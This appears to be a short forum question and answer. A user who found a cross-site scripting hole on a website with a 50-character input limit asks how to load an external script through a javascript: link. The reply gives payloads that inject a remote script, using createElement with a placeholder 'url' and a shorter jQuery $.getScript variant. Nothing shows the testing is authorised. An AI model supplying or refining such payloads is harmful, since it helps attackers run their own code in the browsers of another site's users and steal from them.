I found a xss vulnerability on a website but it only allows <a href=javascript:alert(1)>
.
The problem is it only accepts 50 characters.
My question : can I add source code from where I get my script in a way like javascript:script.src=and here the source of my code
Someone could load external script like this but it is more than 50 charackters
let s = document.createElement("script"); s.src = "url"; document.head.appendChild(s);
If you have JQuery the code will be smaller:
$.getScript("url");